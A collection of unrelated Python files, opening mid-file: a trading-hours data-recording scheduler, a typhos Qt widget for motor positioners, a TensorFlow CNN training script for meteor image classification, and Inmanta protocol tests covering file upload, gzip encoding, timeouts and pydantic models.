or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
# Start child process in trading period
if trading and child_process is None:
print("启动数据录制子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("数据录制子进程启动成功")
# 非记录时间则退出数据录制子进程
if not trading and child_process is not None:
print("关闭数据录制子进程")
child_process.terminate()
child_process.join()
child_process = None
print("数据录制子进程关闭成功")
sys.stdout.flush()
sleep(5)
if __name__ == "__main__":
run_parent()
|
positioner.py
|
import logging
import os.path
import threading
from pydm.widgets.channel import PyDMChannel
from qtpy import QtCore, QtWidgets, uic
from . import utils, widgets
from .status import TyphosStatusThread
logger = logging.getLogger(__name__)
class TyphosPositionerWidget(utils.TyphosBase, widgets.TyphosDesignerMixin):
"""
Widget to interact with a :class:`ophyd.Positioner`.
Standard positioner motion requires a large amount of context for
operators. For most motors, it may not be enough to simply have a text
field where setpoints can be punched in. Instead, information like soft
limits and hardware limit switches are crucial for a full understanding of
the position and behavior of a motor. The widget will work with any object
that implements the method ``set``, however to get other relevant
information, we see if we can find other useful signals. Below is a table
of attributes that the widget looks for to inform screen design.
============== ===========================================================
Widget Attribute Selection
============== ===========================================================
User Readback The ``readback_attribute`` property is used, which defaults
to ``user_readback``. Linked to UI element
``user_readback``.
User Setpoint The ``setpoint_attribute`` property is used, which defaults
to ``user_setpoint``. Linked to UI element
``user_setpoint``.
Limit Switches The ``low_limit_switch_attribute`` and
``high_limit_switch_attribute`` properties are used, which
default to ``low_limit_switch`` and ``high_limit_switch``,
respectively.
Soft Limits The ``low_limit_travel_attribute`` and
``high_limit_travel_attribute`` properties are used, which
default to ``low_limit_travel`` and ``high_limit_travel``,
respectively. As a fallback, the ``limit`` property on the
device may be queried directly.
Set and Tweak Both of these methods simply use ``Device.set`` which is
expected to take a ``float`` and return a ``status`` object
that indicates the motion completeness. Must be implemented.
Stop ``Device.stop()``, if available, otherwise hide the button.
If you have a non-functional ``stop`` method inherited from
a parent device, you can hide it from ``typhos`` by
overriding it with a property that raises
``AttributeError`` on access.
Move Indicator The ``moving_attribute`` property is used, which defaults
to ``motor_is_moving``. Linked to UI element
``moving_indicator``.
Error Message The ``error_message_attribute`` property is used, which
defaults to ``error_message``. Linked to UI element
``error_label``.
Clear Error ``Device.clear_error()``, if applicable. This also clears
any visible error messages from the status returned by
``Device.set``.
Alarm Circle Uses the ``TyphosAlarmCircle`` widget to summarize the
alarm state of all of the device's ``normal`` and
``hinted`` signals.
============== ===========================================================
"""
ui_template = os.path.join(utils.ui_dir, 'widgets', 'positioner.ui')
_readback_attr = 'user_readback'
_setpoint_attr = 'user_setpoint'
_low_limit_switch_attr = 'low_limit_switch'
_high_limit_switch_attr = 'high_limit_switch'
_low_limit_travel_attr = 'low_limit_travel'
_high_limit_travel_attr = 'high_limit_travel'
_velocity_attr = 'velocity'
_acceleration_attr = 'acceleration'
_moving_attr = 'motor_is_moving'
_error_message_attr = 'error_message'
_min_visible_operation = 0.1
def __init__(self, parent=None):
self._moving = False
self._last_move = None
self._readback = None
self._setpoint = None
self._status_thread = None
self._initialized = False
self._moving_channel = None
super().__init__(parent=parent)
self.ui = uic.loadUi(self.ui_template, self)
self.ui.tweak_positive.clicked.connect(self.positive_tweak)
self.ui.tweak_negative.clicked.connect(self.negative_tweak)
self.ui.stop_button.clicked.connect(self.stop)
self.ui.clear_error_button.clicked.connect(self.clear_error)
self.ui.alarm_circle.kindLevel = self.ui.alarm_circle.NORMAL
self.ui.alarm_circle.alarm_changed.connect(self.update_alarm_text)
self.show_expert_button = False
self._after_set_moving(False)
def _clear_status_thread(self):
"""Clear a previous status thread."""
if self._status_thread is None:
return
logger.debug("Clearing current active status")
self._status_thread.disconnect()
self._status_thread = None
def _start_status_thread(self, status, timeout):
"""Start the status monitoring thread for the given status object."""
self._status_thread = thread = TyphosStatusThread(
status, start_delay=self._min_visible_operation,
timeout=timeout
)
thread.status_started.connect(self.move_changed)
thread.status_finished.connect(self._status_finished)
thread.start()
def _get_timeout(self, set_position, settle_time):
"""Use positioner's configuration to select a timeout."""
pos_sig = getattr(self.device, self._readback_attr, None)
vel_sig = getattr(self.device, self._velocity_attr, None)
acc_sig = getattr(self.device, self._acceleration_attr, None)
# Not enough info == no timeout
if pos_sig is None or vel_sig is None:
return None
delta = pos_sig.get() - set_position
speed = vel_sig.get()
# Bad speed == no timeout
if speed == 0:
return None
# Bad acceleration == ignore acceleration
if acc_sig is None:
acc_time = 0
else:
acc_time = acc_sig.get()
# This time is always greater than the kinematic calc
return abs(delta/speed) + 2 * abs(acc_time) + abs(settle_time)
def _set(self, value):
"""Inner `set` routine - call device.set() and monitor the status."""
self._clear_status_thread()
self._last_move = None
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
set_position = value
else:
set_position = float(value)
try:
timeout = self._get_timeout(set_position, 5)
except Exception:
# Something went wrong, just run without a timeout.
logger.exception('Unable to estimate motor timeout.')
timeout = None
logger.debug("Setting device %r to %r with timeout %r",
self.device, value, timeout)
# Send timeout through thread because status timeout stops the move
status = self.device.set(set_position)
self._start_status_thread(status, timeout)
@QtCore.Slot(int)
def combo_set(self, index):
self.set()
@QtCore.Slot()
def set(self):
"""Set the device to the value configured by ``ui.set_value``"""
if not self.device:
return
try:
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
value = self.ui.set_value.currentText()
else:
value = self.ui.set_value.text()
self._set(value)
except Exception as exc:
logger.exception("Error setting %r to %r", self.devices, value)
self._last_move = False
utils.reload_widget_stylesheet(self, cascade=True)
utils.raise_to_operator(exc)
def tweak(self, offset):
"""Tweak by the given ``offset``."""
try:
setpoint = self._get_position() + float(offset)
except Exception:
logger.exception('Tweak failed')
return
self.ui.set_value.setText(str(setpoint))
self.set()
@QtCore.Slot()
def positive_tweak(self):
"""Tweak positive by the amount listed in ``ui.tweak_value``"""
try:
self.tweak(float(self.tweak_value.text()))
except Exception:
logger.exception('Tweak failed')
@QtCore.Slot()
def negative_tweak(self):
"""Tweak negative by the amount listed in ``ui.tweak_value``"""
try:
self.tweak(-float(self.tweak_value.text()))
except Exception:
logger.exception('Tweak failed')
@QtCore.Slot()
def stop(self):
"""Stop device"""
for device in self.devices:
device.stop()
@QtCore.Slot()
def clear_error(self):
"""
Clear the error messages from the device and screen.
The device may have errors in the IOC. These will be cleared by calling
the clear_error method.
The screen may have errors from the status of the last move. These will
be cleared from view.
"""
for device in self.devices:
clear_error_in_background(device)
self._set_status_text('')
# This variable holds True if last move was good, False otherwise
# It also controls whether or not we have a red box on the widget
# False = Red, True = Green, None = no box (in motion is yellow)
if not self._last_move:
self._last_move = None
utils.reload_widget_stylesheet(self, cascade=True)
def _get_position(self):
if not self._readback:
raise Exception("No Device configured for widget!")
return self._readback.get()
@utils.linked_attribute('readback_attribute', 'ui.user_readback', True)
def _link_readback(self, signal, widget):
"""Link the positioner readback with the ui element."""
self._readback = signal
@utils.linked_attribute('setpoint_attribute', 'ui.user_setpoint', True)
def _link_setpoint(self, signal, widget):
"""Link the positioner setpoint with the ui element."""
self._setpoint = signal
if signal is not None:
# Seed the set_value text with the user_setpoint channel value.
if hasattr(widget, 'textChanged'):
widget.textChanged.connect(self._user_setpoint_update)
@utils.linked_attribute('low_limit_switch_attribute',
'ui.low_limit_switch', True)
def _link_low_limit_switch(self, signal, widget):
"""Link the positioner lower limit switch with the ui element."""
if signal is None:
widget.hide()
@utils.linked_attribute('high_limit_switch_attribute',
'ui.high_limit_switch', True)
def _link_high_limit_switch(self, signal, widget):
"""Link the positioner high limit switch with the ui element."""
if signal is None:
widget.hide()
@utils.linked_attribute('low_limit_travel_attribute', 'ui.low_limit', True)
def _link_low_travel(self, signal, widget):
"""Link the positioner lower travel limit with the ui element."""
return signal is not None
@utils.linked_attribute('high_limit_travel_attribute', 'ui.high_limit',
True)
def _link_high_travel(self, signal, widget):
"""Link the positioner high travel limit with the ui element."""
return signal is not None
def _link_limits_by_limits_attr(self):
"""Link limits by using ``device.limits``."""
device = self.device
try:
low_limit, high_limit = device.limits
except Exception:
...
else:
if low_limit < high_limit:
self.ui.low_limit.setText(str(low_limit))
self.ui.high_limit.setText(str(high_limit))
return
# If not found or invalid, hide them:
self.ui.low_limit.hide()
self.ui.high_limit.hide()
@utils.linked_attribute('moving_attribute', 'ui.moving_indicator', True)
def _link_moving(self, signal, widget):
"""Link the positioner moving indicator with the ui element."""
if signal is None:
widget.hide()
return False
widget.show()
# Additional handling for updating self.moving
if self._moving_channel is not None:
self._moving_channel.disconnect()
chname = utils.channel_from_signal(signal)
self._moving_channel = PyDMChannel(
address=chname,
value_slot=self._set_moving,
)
self._moving_channel.connect()
return True
@utils.linked_attribute('error_message_attribute', 'ui.error_label', True)
def _link_error_message(self, signal, widget):
"""Link the IOC error message with the ui element."""
if signal is None:
widget.hide()
def _define_setpoint_widget(self):
"""
Leverage information at describe to define whether to use a
PyDMLineEdit or a PyDMEnumCombobox as setpoint widget.
"""
try:
setpoint_signal = getattr(self.device, self.setpoint_attribute)
selection = setpoint_signal.enum_strs is not None
except Exception:
selection = False
if selection:
self.ui.set_value = widgets.NoScrollComboBox()
self.ui.set_value.addItems(setpoint_signal.enum_strs)
# Activated signal triggers only when the user selects an option
self.ui.set_value.activated.connect(self.set)
self.ui.set_value.setSizePolicy(
QtWidgets.QSizePolicy.Expanding,
QtWidgets.QSizePolicy.Fixed,
)
self.ui.set_value.setMinimumContentsLength(20)
self.ui.tweak_widget.setVisible(False)
else:
self.ui.set_value = QtWidgets.QLineEdit()
self.ui.set_value.setAlignment(QtCore.Qt.AlignCenter)
self.ui.set_value.returnPressed.connect(self.set)
self.ui.setpoint_layout.addWidget(self.ui.set_value)
@property
def device(self):
"""The associated device."""
try:
return self.devices[0]
except Exception:
...
def add_device(self, device):
"""Add a device to the widget"""
# Add device to cache
self.devices.clear() # only one device allowed
super().add_device(device)
self._define_setpoint_widget()
self._link_readback()
self._link_setpoint()
self._link_low_limit_switch()
self._link_high_limit_switch()
# If the stop method is missing, hide the button
try:
device.stop
self.ui.stop_button.show()
except AttributeError:
self.ui.stop_button.hide()
if not (self._link_low_travel() and self._link_high_travel()):
self._link_limits_by_limits_attr()
if self._link_moving():
self.ui.moving_indicator_label.show()
else:
self.ui.moving_indicator_label.hide()
self._link_error_message()
if self.show_expert_button:
self.ui.expert_button.devices.clear()
self.ui.expert_button.add_device(device)
self.ui.alarm_circle.clear_all_alarm_configs()
self.ui.alarm_circle.add_device(device)
@QtCore.Property(bool, designable=False)
def moving(self):
"""
Current state of widget
This will lag behind the actual state of the positioner in order to
prevent unnecessary rapid movements
"""
return self._moving
@moving.setter
def moving(self, value):
if value != self._moving:
self._moving = value
self._after_set_moving(value)
def _after_set_moving(self, value):
"""
Common updates needed after a change to the moving state.
This is pulled out as a separate method because we need
to initialize the label here during __init__ without
modifying self.moving.
"""
utils.reload_widget_stylesheet(self, cascade=True)
if value:
self.ui.moving_indicator_label.setText('moving')
else:
self.ui.moving_indicator_label.setText('done')
def _set_moving(self, value):
"""
Slot for updating the self.moving property.
This is used e.g. in updating the moving state when the
motor starts moving in EPICS but not by the request of
this widget.
"""
self.moving = bool(value)
@QtCore.Property(bool, designable=False)
def successful_move(self):
"""The last requested move was successful"""
return self._last_move is True
@QtCore.Property(bool, designable=False)
def failed_move(self):
"""The last requested move failed"""
return self._last_move is False
@QtCore.Property(str, designable=True)
def readback_attribute(self):
"""The attribute name for the readback signal."""
return self._readback_attr
@readback_attribute.setter
def readback_attribute(self, value):
self._readback_attr = value
@QtCore.Property(str, designable=True)
def setpoint_attribute(self):
"""The attribute name for the setpoint signal."""
return self._setpoint_attr
@setpoint_attribute.setter
def setpoint_attribute(self, value):
self._setpoint_attr = value
@QtCore.Property(str, designable=True)
def low_limit_switch_attribute(self):
"""The attribute name for the low limit switch signal."""
return self._low_limit_switch_attr
@low_limit_switch_attribute.setter
def low_limit_switch_attribute(self, value):
self._low_limit_switch_attr = value
@QtCore.Property(str, designable=True)
def high_limit_switch_attribute(self):
"""The attribute name for the high limit switch signal."""
return self._high_limit_switch_attr
@high_limit_switch_attribute.setter
def high_limit_switch_attribute(self, value):
self._high_limit_switch_attr = value
@QtCore.Property(str, designable=True)
def low_limit_travel_attribute(self):
"""The attribute name for the low limit signal."""
return self._low_limit_travel_attr
@low_limit_travel_attribute.setter
def low_limit_travel_attribute(self, value):
self._low_limit_travel_attr = value
@QtCore.Property(str, designable=True)
def high_limit_travel_attribute(self):
"""The attribute name for the high (soft) limit travel signal."""
return self._high_limit_travel_attr
@high_limit_travel_attribute.setter
def high_limit_travel_attribute(self, value):
self._high_limit_travel_attr = value
@QtCore.Property(str, designable=True)
def velocity_attribute(self):
"""The attribute name for the velocity signal."""
return self._velocity_attr
@velocity_attribute.setter
def velocity_attribute(self, value):
self._velocity_attr = value
@QtCore.Property(str, designable=True)
def acceleration_attribute(self):
"""The attribute name for the acceleration time signal."""
return self._acceleration_attr
@acceleration_attribute.setter
def acceleration_attribute(self, value):
self._acceleration_attr = value
@QtCore.Property(str, designable=True)
def moving_attribute(self):
"""The attribute name for the motor moving indicator."""
return self._moving_attr
@moving_attribute.setter
def moving_attribute(self, value):
self._moving_attr = value
@QtCore.Property(str, designable=True)
def error_message_attribute(self):
"""The attribute name for the IOC error message label."""
return self._error_message_attr
@error_message_attribute.setter
def error_message_attribute(self, value):
self._error_message_attr = value
@QtCore.Property(bool, designable=True)
def show_expert_button(self):
"""
If True, show the expert button.
The expert button opens a full suite for the device.
You typically want this False when you're already inside the
suite that the button would open.
You typically want this True when you're using the positioner widget
inside of an unrelated screen.
This will default to False.
"""
return self._show_expert_button
@show_expert_button.setter
def show_expert_button(self, show):
self._show_expert_button = show
if show:
self.ui.expert_button.show()
else:
self.ui.expert_button.hide()
def move_changed(self):
"""Called when a move is begun"""
logger.debug("Begin showing move in TyphosPositionerWidget")
self.moving = True
def _set_status_text(self, text, *, max_length=60):
"""Set the status text label to ``text``."""
if len(text) >= max_length:
self.ui.status_label.setToolTip(text)
text = text[:max_length] + '...'
else:
self.ui.status_label.setToolTip('')
self.ui.status_label.setText(text)
def _status_finished(self, result):
"""Called when a move is complete."""
if isinstance(result, Exception):
text = f'<b>{result.__class__.__name__}</b> {result}'
else:
text = ''
self._set_status_text(text)
success = not isinstance(result, Exception)
logger.debug("Completed move in TyphosPositionerWidget (result=%r)",
result)
self._last_move = success
self.moving = False
@QtCore.Slot(str)
def _user_setpoint_update(self, text):
"""Qt slot - indicating the ``user_setpoint`` widget text changed."""
try:
text = text.strip().split(' ')[0]
text = text.strip()
except Exception:
return
# Update set_value if it's not being edited.
if not self.ui.set_value.hasFocus():
if isinstance(self.ui.set_value, widgets.NoScrollComboBox):
try:
idx = int(text)
self.ui.set_value.setCurrentIndex(idx)
self._initialized = True
except ValueError:
logger.debug('Failed to convert value to int. %s', text)
else:
self._initialized = True
self.ui.set_value.setText(text)
def update_alarm_text(self, alarm_level):
"""
Label the alarm circle with a short text bit.
"""
alarms = self.ui.alarm_circle.AlarmLevel
if alarm_level == alarms.NO_ALARM:
text = 'no alarm'
elif alarm_level == alarms.MINOR:
text = 'minor'
elif alarm_level == alarms.MAJOR:
text = 'major'
elif alarm_level == alarms.DISCONNECTED:
text = 'no conn'
else:
text = 'invalid'
self.ui.alarm_label.setText(text)
def clear_error_in_background(device):
def inner():
try:
device.clear_error()
except AttributeError:
pass
except Exception:
msg = "Could not clear error!"
logger.error(msg)
logger.debug(msg, exc_info=True)
td = threading.Thread(target=inner)
td.start()
|
model_2_01.py
|
import tensorflow as tf
from tensorflow.keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.callbacks import Callback
import numpy as np
import matplotlib.pyplot as plt
from os.path import join
import multiprocessing
from performanceMeasure import getPerformanceMeasures, plotAccuracyAndLoss
def trainCNN( ):
tf.keras.backend.clear_session()
ImageResolution = (640, 360)
ImageResolutionGrayScale = (640, 360, 1)
modelNumber = 'model_2_01'
base_dir = 'C:\work_dir\meteorData\extraData_70_30'
results_dir = join('G:\GIEyA\TFG\meteor_classification\\results_2', modelNumber)
results_dir_weights = join(results_dir, 'weights')
train_dir = join(base_dir, 'train')
validation_dir = join(base_dir, 'validation')
#Rescale all images by 1./255
train_datagen = ImageDataGenerator(rescale=1.0/255)
validation_datagen = ImageDataGenerator(rescale=1.0/255.)
train_generator = train_datagen.flow_from_directory(train_dir,
batch_size=16,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
validation_generator = validation_datagen.flow_from_directory(validation_dir,
batch_size=16,
class_mode='binary',
color_mode='grayscale',
target_size=ImageResolution)
model = tf.keras.models.Sequential([
Conv2D(16, (11, 11), activation='relu', input_shape=ImageResolutionGrayScale, strides=1),
MaxPooling2D(pool_size=(3, 3)),
Dropout(0.25),
Conv2D(12, (7, 7), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.25),
Conv2D(12, (5, 5), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.25),
Conv2D(12, (3, 3), activation='relu', kernel_initializer='he_uniform'),
MaxPooling2D(pool_size=(2, 2)),
Dropout(0.50),
Flatten(),
Dense(480, activation='relu', kernel_initializer='he_uniform'),
Dropout(0.30),
Dense(16, activation='relu', kernel_initializer='he_uniform'),
Dropout(0.20),
Dense(1, activation='sigmoid', kernel_initializer='he_uniform')
])
print(model.summary())
optimizer = Adam(learning_rate=5e-4)
model.compile(optimizer=optimizer,
loss='binary_crossentropy',
metrics=['accuracy'])
class SaveModelCallback(Callback):
def __init__(self, thresholdTrain, thresholdValid):
super(SaveModelCallback, self).__init__()
self.thresholdTrain = thresholdTrain
self.thresholdValid = thresholdValid
def on_epoch_end(self, epoch, logs=None):
if((logs.get('accuracy') >= self.thresholdTrain) and (logs.get('val_accuracy') >= self.thresholdValid)):
model.save_weights(join(results_dir_weights, modelNumber + '_acc_' + str(logs.get('accuracy'))[0:6]
+ '_val_acc_' + str(logs.get('val_accuracy'))[0:6] + '.h5'), save_format='h5')
callback_90_84 = SaveModelCallback(0.900, 0.840)
# Training -> 62483 (3905x16)
# Validation -> 26780 (1673x16)
model.load_weights('G:\GIEyA\TFG\meteor_classification\\results\weights\model_19\model_19_acc_0.9297_val_acc0.8577.h5')
history = model.fit(train_generator,
validation_data=validation_generator,
steps_per_epoch=3905,
epochs=10, #Later train with more epochs if neccessary
validation_steps=1673,
shuffle=True,
verbose=1,
callbacks=[callback_90_84])
################################# PRINT MODEL PERFORMANCE AND GET PERFORMANCE MEASURES #################################
# Get performance measures:
getPerformanceMeasures(model, validation_dir, ImageResolution, join(results_dir, 'performance_' + modelNumber + '.txt'), threshold=0.5)
# Plot Accuracy and Loss in both train and validation sets
plotAccuracyAndLoss(history)
#########################################################################################################################
if __name__ == '__main__':
p = multiprocessing.Process(target=trainCNN)
p.start()
p.join()
|
test_protocol.py
|
"""
Copyright 2018 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: code@inmanta.com
"""
import asyncio
import base64
import datetime
import json
import os
import random
import threading
import time
import urllib.parse
import uuid
from enum import Enum
from itertools import chain
from typing import Any, Dict, Iterator, List, Optional, Union
import pydantic
import pytest
import tornado
from pydantic.types import StrictBool
from tornado import gen, web
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
from tornado.httputil import url_concat
from tornado.platform.asyncio import AnyThreadEventLoopPolicy
from inmanta import config, const, protocol
from inmanta.data.model import BaseModel
from inmanta.protocol import VersionMatch, exceptions, json_encode
from inmanta.protocol.common import (
HTML_CONTENT,
HTML_CONTENT_WITH_UTF8_CHARSET,
OCTET_STREAM_CONTENT,
ZIP_CONTENT,
ArgOption,
InvalidMethodDefinition,
InvalidPathException,
MethodProperties,
Result,
ReturnValue,
)
from inmanta.protocol.methods import ENV_OPTS
from inmanta.protocol.rest import CallArguments
from inmanta.protocol.return_value_meta import ReturnValueWithMeta
from inmanta.server import config as opt
from inmanta.server.config import server_bind_port
from inmanta.server.protocol import Server, ServerSlice
from inmanta.types import Apireturn
from inmanta.util import hash_file
from utils import configure
def make_random_file(size=0):
"""
Generate a random file.
:param size: If size is > 0 content is generated that is equal or more than size.
"""
randomvalue = str(random.randint(0, 10000))
if size > 0:
while len(randomvalue) < size:
randomvalue += randomvalue
content = ("Hello world %s\n" % (randomvalue)).encode()
hash = hash_file(content)
body = base64.b64encode(content).decode("ascii")
return (hash, content, body)
@pytest.mark.asyncio
async def test_client_files(client):
(hash, content, body) = make_random_file()
# Check if the file exists
result = await client.stat_file(id=hash)
assert result.code == 404
# Create the file
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
# Get the file
result = await client.get_file(id=hash)
assert result.code == 200
assert "content" in result.result
assert result.result["content"] == body
@pytest.mark.asyncio
async def test_client_files_lost(client):
(hash, content, body) = make_random_file()
# Get the file
result = await client.get_file(id=hash)
assert result.code == 404
@pytest.mark.asyncio
async def test_sync_client_files(client):
# work around for https://github.com/pytest-dev/pytest-asyncio/issues/168
asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
done = []
limit = 100
sleep = 0.01
def do_test():
sync_client = protocol.SyncClient("client")
(hash, content, body) = make_random_file()
# Check if the file exists
result = sync_client.stat_file(id=hash)
assert result.code == 404
# Create the file
result = sync_client.upload_file(id=hash, content=body)
assert result.code == 200
# Get the file
result = sync_client.get_file(id=hash)
assert result.code == 200
assert "content" in result.result
assert result.result["content"] == body
done.append(True)
thread = threading.Thread(target=do_test)
thread.start()
while len(done) == 0 and limit > 0:
await gen.sleep(sleep)
limit -= 1
thread.join()
assert len(done) > 0
@pytest.mark.asyncio
async def test_client_files_stat(client):
file_names = []
i = 0
while i < 10:
(hash, content, body) = make_random_file()
if hash not in file_names:
file_names.append(hash)
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
i += 1
result = await client.stat_files(files=file_names)
assert len(result.result["files"]) == 0
other_files = ["testtest"]
result = await client.stat_files(files=file_names + other_files)
assert len(result.result["files"]) == len(other_files)
@pytest.mark.asyncio
async def test_diff(client):
ca = "Hello world\n".encode()
ha = hash_file(ca)
result = await client.upload_file(id=ha, content=base64.b64encode(ca).decode("ascii"))
assert result.code == 200
cb = "Bye bye world\n".encode()
hb = hash_file(cb)
result = await client.upload_file(id=hb, content=base64.b64encode(cb).decode("ascii"))
assert result.code == 200
diff = await client.diff(ha, hb)
assert diff.code == 200
assert len(diff.result["diff"]) == 5
diff = await client.diff(0, hb)
assert diff.code == 200
assert len(diff.result["diff"]) == 4
diff = await client.diff(ha, 0)
assert diff.code == 200
assert len(diff.result["diff"]) == 4
@pytest.mark.asyncio
async def test_client_files_bad(server, client):
(hash, content, body) = make_random_file()
# Create the file
result = await client.upload_file(id=hash + "a", content=body)
assert result.code == 400
@pytest.mark.asyncio
async def test_client_files_corrupt(client):
(hash, content, body) = make_random_file()
# Create the file
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
state_dir = opt.state_dir.get()
file_dir = os.path.join(state_dir, "server", "files")
file_name = os.path.join(file_dir, hash)
with open(file_name, "wb+") as fd:
fd.write("Haha!".encode())
opt.server_delete_currupt_files.set("false")
result = await client.get_file(id=hash)
assert result.code == 500
result = await client.upload_file(id=hash, content=body)
assert result.code == 500
opt.server_delete_currupt_files.set("true")
result = await client.get_file(id=hash)
assert result.code == 500
result = await client.upload_file(id=hash, content=body)
assert result.code == 200
@pytest.mark.asyncio
async def test_gzip_encoding(server):
"""
Test if the server accepts gzipped encoding and returns gzipped encoding.
"""
(hash, content, body) = make_random_file(size=1024)
port = opt.get_bind_port()
url = "http://localhost:%s/api/v1/file/%s" % (port, hash)
zipped, body = protocol.gzipped_json({"content": body})
assert zipped
request = HTTPRequest(
url=url,
method="PUT",
headers={"Accept-Encoding": "gzip", "Content-Encoding": "gzip"},
body=body,
decompress_response=True,
)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
request = HTTPRequest(url=url, method="GET", headers={"Accept-Encoding": "gzip"}, decompress_response=True)
client = AsyncHTTPClient()
response = await client.fetch(request)
assert response.code == 200
assert response.headers["X-Consumed-Content-Encoding"] == "gzip"
class MainHandler(web.RequestHandler):
def get(self):
time.sleep(1.1)
@pytest.fixture(scope="function")
async def app(unused_tcp_port):
http_app = web.Application([(r"/api/v1/file/abc", MainHandler)])
server = tornado.httpserver.HTTPServer(http_app)
server.bind(unused_tcp_port)
server.start()
yield server
server.stop()
await server.close_all_connections()
@pytest.mark.asyncio(timeout=30)
async def test_timeout_error(app):
"""
Test test verifies that the protocol client can handle requests that timeout. This means it receives a http error
status that is not generated by the server but by the client.
"""
from inmanta.config import Config
Config.load_config()
port = str(list(app._sockets.values())[0].getsockname()[1])
Config.set("client_rest_transport", "port", port)
Config.set("client_rest_transport", "request_timeout", "1")
from inmanta import protocol
client = protocol.Client("client")
x = await client.get_file(id="abc")
assert x.code == 599
assert "message" in x.result
@pytest.mark.asyncio
async def test_method_properties():
"""
Test method properties decorator and helper functions
"""
@protocol.method(path="/test", operation="PUT", client_types=["api"], api_prefix="x", api_version=2)
def test_method(name):
"""
Create a new project
"""
props = protocol.common.MethodProperties.methods["test_method"][0]
assert "Authorization" in props.get_call_headers()
assert props.get_listen_url() == "/x/v2/test"
assert props.get_call_url({}) == "/x/v2/test"
@pytest.mark.asyncio
async def test_invalid_client_type():
"""
Test invalid client ype
"""
with pytest.raises(InvalidMethodDefinition) as e:
@protocol.method(path="/test", operation="PUT", client_types=["invalid"])
def test_method(name):
"""
Create a new project
"""
assert "Invalid client type invalid specified for function" in str(e)
@pytest.mark.asyncio
async def test_call_arguments_defaults():
"""
Test processing RPC messages
"""
@protocol.method(path="/test", operation="PUT", client_types=["api"])
def test_method(name: str, value: int = 10):
"""
Create a new project
"""
call = CallArguments(protocol.common.MethodProperties.methods["test_method"][0], {"name": "test"}, {})
await call.process()
assert call.call_args["name"] == "test"
assert call.call_args["value"] == 10
def test_create_client():
with pytest.raises(AssertionError):
protocol.SyncClient("agent", "120")
with pytest.raises(AssertionError):
protocol.Client("agent", "120")
@pytest.mark.asyncio
async def test_pydantic():
"""
Test validating pydantic objects
"""
class Project(BaseModel):
id: uuid.UUID
name: str
@protocol.method(path="/test", operation="PUT", client_types=["api"])
def test_method(project: Project):
"""
Create a new project
"""
id = uuid.uuid4()
call = CallArguments(
protocol.common.MethodProperties.methods["test_method"][0], {"project": {"name": "test", "id": str(id)}}, {}
)
await call.process()
project = call.call_args["project"]
assert project.name == "test"
assert project.id == id
with pytest.raises(exceptions.BadRequest):
call = CallArguments(
protocol.common.MethodProperties.methods["test_method"][0], {"project": {"name": "test", "id": "abcd"}}, {}
)
await call.process()
def test_pydantic_json():
"""
Test running pydanyic objects through the json encoder
"""
class Options(str, Enum):
yes = "yes"
no = "no"
class Project(BaseModel):
id: uuid.UUID
name: str
opts: Options
project = Project(id=uuid.uuid4(), name="test", opts="no")
assert project.opts == Options.no
json_string = json_encode(project)
data = json.loads(json_string)
assert "id" in data
assert "name" in data
assert data["id"] == str(project.id)
assert data["name"] == "test"
# Now create the project again
new = Project(**data)
assert project == new
assert project is not new
@pytest.mark.asyncio
async def test_pydantic_alias(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Round trip test on aliased object
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class Project(BaseModel):
source: str
validate_: bool
class Config:
fields = {"validate_": {"alias": "validate"}}
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(project: Project) -> ReturnValue[Project]: # NOQA
"""
Create a new project
"""
@protocol.typedmethod(path="/test2", operation="POST", client_types=["api"])
def test_method2(project: List[Project]) -> ReturnValue[List[Project]]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_methodi(self, project: Project) -> ReturnValue[Project]:
new_project = project.copy()
return ReturnValue(response=new_project)
@protocol.handle(test_method2)
async def test_method2i(self, project: List[Project]) -> ReturnValue[List[Project]]:
return ReturnValue(response=project)
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
projectt = Project(id=uuid.uuid4(), source="test", validate=True)
assert projectt.validate_ is True
projectf = Project(id=uuid.uuid4(), source="test", validate=False)
assert projectf.validate_ is False
async def roundtrip(obj: Project) -> None:
data = await client.test_method(obj)
assert obj.validate_ == data.result["data"]["validate"]
data = await client.test_method2([obj])
assert obj.validate_ == data.result["data"][0]["validate"]
await roundtrip(projectf)
await roundtrip(projectt)
@pytest.mark.asyncio
async def test_return_non_warnings(unused_tcp_port, postgres_db, database_name, async_finalizer):
"""
Test return none but pushing warnings
"""
configure(unused_tcp_port, database_name, postgres_db.port)
class ProjectServer(ServerSlice):
@protocol.typedmethod(path="/test", operation="POST", client_types=["api"])
def test_method(name: str) -> ReturnValue[None]: # NOQA
"""
Create a new project
"""
@protocol.handle(test_method)
async def test_method_handler(self, name) -> ReturnValue[None]:
rv = ReturnValue()
rv.add_warnings(["error1", "error2"])
return rv
rs = Server()
server = ProjectServer(name="projectserver")
rs.add_slice(server)
await rs.start()
async_finalizer.add(server.stop)
async_finalizer.add(rs.stop)
client = protocol.Client("client")
response = await client.test_method("x")
assert response.code == 200
assert "data" in response.result
